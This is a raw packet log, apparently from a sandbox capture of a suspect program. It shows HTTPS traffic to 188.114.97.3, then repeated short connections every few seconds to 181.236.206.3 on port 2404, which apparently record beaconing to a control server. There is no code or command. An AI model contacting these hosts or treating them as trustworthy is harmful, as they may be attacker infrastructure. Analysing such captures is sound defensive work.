Sep 26, 2024 10:58:06.843786955 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:06.843956947 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:06.863358021 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:06.863379002 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:06.863668919 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:06.864514112 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:06.907411098 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.123692989 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.123733044 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.123785973 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.123815060 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.123833895 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.123859882 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.123881102 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.123888969 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.123924971 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.123930931 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.157321930 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.157371044 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.157386065 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.157394886 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.157404900 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.157440901 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.204046965 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.204061031 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.210582018 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.210613966 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.210644007 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.210649014 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.210654974 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.210685968 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.210705042 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.210709095 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.210721970 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.211380959 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.211429119 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.211436987 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.211442947 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.211487055 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.211492062 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.211949110 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.211977959 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.211993933 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.211998940 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.212035894 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.243870020 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.243933916 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.243964911 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.243989944 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.244014025 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.244050026 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.244055033 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.244270086 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.244307041 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.244307995 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.244316101 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.244358063 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.244362116 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.290965080 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.291058064 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.291106939 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.297207117 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.297283888 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.297285080 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.297312021 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.297416925 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.297427893 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.297434092 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.297477961 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.298007011 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.298068047 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.298707962 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.298757076 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.298850060 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.298904896 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.299515963 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.299561024 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.299710989 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.299755096 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.300496101 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.300542116 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.300646067 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.300692081 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.330558062 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.330591917 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.330651045 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.330681086 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.330694914 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.330720901 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.331264973 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.331321001 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.331562042 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.331605911 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.332056046 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.332103968 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.370811939 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.370948076 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.377584934 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.377693892 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.384300947 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.384354115 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.384365082 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.384396076 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.384412050 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.384630919 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.384676933 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.384685993 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.384727001 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.384747028 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.384794950 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.385215044 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.385268927 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.385373116 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.385421038 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.386123896 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.386172056 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.386277914 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.386327028 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.386972904 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.387104034 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.387186050 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.387234926 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.387257099 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.387306929 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.387968063 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.388017893 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.388154984 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.388204098 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.388763905 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.388808966 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.417371035 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.417424917 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.417467117 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.417506933 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.417522907 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.417615891 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.417809963 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.417815924 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.417865992 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.417912960 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.417977095 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.418025017 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.418096066 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.418320894 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.418374062 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.418379068 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.418423891 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.418488026 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.418541908 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.418562889 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.418612003 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.418694019 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.418745041 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.419255018 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.419306040 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.419409037 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.419460058 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.457582951 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.457794905 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.470990896 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.471002102 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.471034050 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.471180916 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.471185923 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.471236944 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.471898079 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.471921921 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.471986055 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.471991062 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.472038031 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.472225904 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.472240925 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.472302914 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.472306967 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.472357035 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.473037004 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.473109961 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.473202944 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.473261118 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.473262072 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.473273039 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.473315954 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.473337889 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.473342896 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.504354000 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.504374981 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.504472971 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.504492998 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.504565001 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.504621029 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.504628897 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.505321980 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.505335093 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.505389929 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.505393982 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.547931910 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.551016092 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.551039934 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.551259995 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.551273108 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.551337004 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.557858944 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.557883024 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.557940006 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.557950020 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.558006048 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.559324026 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.559340954 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.559406996 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.559412003 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.559431076 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.559448957 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.559453964 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.559462070 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.559490919 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.559520960 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.559715986 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.559731007 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.559783936 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.559788942 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.559839010 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.590934038 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.590955019 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.591142893 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.591156006 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.591201067 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.591358900 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.591372967 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.591440916 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.591445923 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.591466904 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.591496944 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.591916084 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.591932058 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.591986895 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.591991901 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.592010975 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.592034101 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.637736082 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.637759924 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.637881994 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.637936115 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.638115883 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.644476891 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.644567013 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.644582987 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.644857883 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.644920111 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.644925117 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.645311117 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.645328045 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.645369053 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.645375013 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.645399094 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.646132946 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.646156073 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.646205902 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.646214008 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.646447897 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.646465063 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.646511078 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.646517038 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.646846056 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.646899939 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.646904945 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.677659988 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.677779913 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.677799940 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.678148031 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.678167105 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.678206921 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.678212881 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.678257942 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.678695917 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.678709984 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.678764105 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.678770065 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.719672918 CEST  49712  443  192.168.2.6  188.114.97.3
Sep 26, 2024 10:58:07.724628925 CEST  443  49712  188.114.97.3  192.168.2.6
Sep 26, 2024 10:58:07.724651098 CEST  443  49712  188.114.97.3  192.168.2.6
                                      Sep 26, 2024 10:58:07.724759102 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.724766016 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.724812031 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.731422901 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.731439114 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.731503010 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.731509924 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.731550932 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.731981039 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.731997967 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.732038975 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.732043982 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.732067108 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.732096910 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.732414961 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.732458115 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.732486010 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.732489109 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.732498884 CEST44349712188.114.97.3192.168.2.6
                                      Sep 26, 2024 10:58:07.732522964 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.732547045 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:07.732944965 CEST49712443192.168.2.6188.114.97.3
                                      Sep 26, 2024 10:58:09.549937010 CEST497132404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:09.554897070 CEST240449713181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:09.555077076 CEST497132404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:09.556118965 CEST497132404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:09.561022043 CEST240449713181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:11.190115929 CEST240449713181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:11.190236092 CEST497132404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:11.190323114 CEST497132404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:11.195261002 CEST240449713181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:12.229720116 CEST497152404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:12.235595942 CEST240449715181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:12.235682964 CEST497152404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:12.269129992 CEST497152404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:12.273993015 CEST240449715181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:13.948827982 CEST240449715181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:13.948889971 CEST497152404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:13.948940039 CEST497152404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:13.953882933 CEST240449715181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:14.954943895 CEST497162404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:14.960289001 CEST240449716181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:14.960366011 CEST497162404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:14.960706949 CEST497162404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:14.966623068 CEST240449716181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:16.568317890 CEST240449716181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:16.568392992 CEST497162404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:16.568449974 CEST497162404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:16.573303938 CEST240449716181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:17.582221985 CEST497202404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:17.587119102 CEST240449720181.236.206.3192.168.2.6
                                      Sep 26, 2024 10:58:17.587208986 CEST497202404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:17.587794065 CEST497202404192.168.2.6181.236.206.3
                                      Sep 26, 2024 10:58:17.594093084 CEST240449720181.236.206.3192.168.2.6
